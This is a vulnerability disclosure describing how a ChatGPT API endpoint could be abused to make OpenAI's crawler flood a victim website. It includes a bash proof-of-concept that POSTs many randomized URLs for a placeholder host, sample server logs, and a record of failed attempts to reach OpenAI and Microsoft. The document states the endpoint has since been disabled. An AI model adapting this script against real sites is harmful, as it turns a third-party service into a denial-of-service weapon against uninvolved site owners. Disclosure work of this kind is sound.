Severity: High - 8.6 CVSS score because it is network-based, low complexity, no privileges required, no user interaction required, changed scope, no impact on confidentality or integrity but high impact on availability.
ChatGPT crawler can be triggered to DDoS a victim website via HTTP request to unrelated ChatGPT API. This defect in OpenAI software will spawn a DDoS attack on unsuspecting victim website, utilizing multiple Microsoft Azure IP address ranges on which ChatGPT crawler is running.
Important
OpenAI has disabled the vulnerable API endpoint after this vulnerability was discussed on HackerNews and TheRegister wrote an article titled "OpenAI's ChatGPT crawler can be tricked into DDoSing sites, answering your queries" about it. The proof-of-concept code does not work any more.
ChatGPT API exhibits a severe quality defect when handling HTTP POST requests to https://chatgpt.com/backend-api/attributions.
The API expects a list of hyperlinks in parameter urls.
It is commonly known that hyperlinks to the same website can be written in many different ways.
Due to bad programming practices, OpenAI does not check if a hyperlink to the same resource appears multiple times in the list.
OpenAI also does not enforce a limit on the maximum number of hyperlinks stored in the urls parameter, thereby enabling the transmission of many thousands of hyperlinks within a single HTTP request.
Immediately after a well-formed HTTP POST request is received by OpenAI's https://chatgpt.com/backend-api/attributions API endpoint, OpenAI will initiate one HTTP request for each hyperlink contained in the urls parameter from the OpenAI servers located in the Microsoft Azure cloud.
At this point, a victim website will experience a high number of parallel connection attempts and HTTP requests from OpenAI's servers. Even though OpenAI is aware that they are sending a large number of requests to the same website at the same point in time, they don't make any attempt to limit the number of connections to the same website or even prevent the issuance of duplicate requests to the same resource.
Depending on the number of hyperlinks transmitted to OpenAI via the urls parameter, the large number of connections from OpenAI's servers might overwhelm the victim website.
This software defect provides an significant amplification factor for potential DDoS attacks. OpenAI exhibits a lack quality control processes in their software engineering and should remediate this defect as soon as possible.
This proof of concept code highlights the defects of the OpenAI's API by initiating the sending 50 HTTP requests from OpenAI servers to my-website.localhost.
#!/bin/bash
echo {1..50} | tr ' ' '\n' | (
while read -r i;
do echo "https://my-website.localhost:$RANDOM/$i-$RANDOM.txt";
done
) | jq -R -s -j -c '{ "urls": split("\n")[:-1] }' \
| curl -v --http1.1 \
-H 'user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.32 (KHTML, like Gecko) Chrome/133.0.0.1 Safari/535.32' \
-H "content-type: application/json" \
-H 'origin: https://www.chatgpt.com' \
--data-binary @- -X POST 'https://chatgpt.com/backend-api/attributions'The log files on webserver my-website.localhost will show many connection attempts by ChatGPT Crawler happening in the same second:
...
2025-01-10 40.84.221.211 "GET /9185 HTTP/2.0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot"
2025-01-10 40.84.221.210 "GET /1190 HTTP/2.0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot"
2025-01-10 40.84.221.208 "GET /9185 HTTP/2.0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot"
2025-01-10 40.84.221.208 "GET /1190 HTTP/2.0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot"
...
This software defect was discovered in January 2025 and responsibly disclosed to both OpenAI as owner of the defective software and Microsoft as the owner of the servers which spawn the massive number of potentially malicious web requests.
Unfortunately it was not possible to obtain a reaction from either party in due time, even though many attempts to ensure a mitigation of this software defect were made, including:
- contacting OpenAI security team via report on their BugCrowd vulnerability reporting platform (no response from OpenAI)
- contacting OpenAI security team via e-mail to
[email protected]as described in the.well-known/security.txtfile on their web server (message "mailbox is not used any more", no response from OpenAI) - contacting OpenAI employees via reports and security advisories posted to their github repositories (no response from OpenAI)
- contacting OpenAI data privacy officer via email to
[email protected]and[email protected](email response written by AI pointing to FAQ website) - contacting OpenAI support staff via email to
[email protected](email response written by AI pointing to FAQ website) - contacting Microsoft security team via e-mail to
[email protected],[email protected], and many more (no response from Microsoft) - contacting Microsoft security team via forms filled out on
cert.microsoft.com(email response written by AI: "case closed") - contacting Microsoft Azure network operations team via e-mail to the contacts provided in WHOIS records (no response from Microsoft)
- contacting CloudFlare security team via report on HackerOne, as CloudFlare provides the gateway server to
https://chatgpt.com(HackerOne staff closes report as "informative", refuses to forward information to CloudFlare)
As of Friday, 10 Jan 2025, after various reports over legal communication channels, this software defect is neither resolved by OpenAI/Microsoft nor did they acknowledge its existence.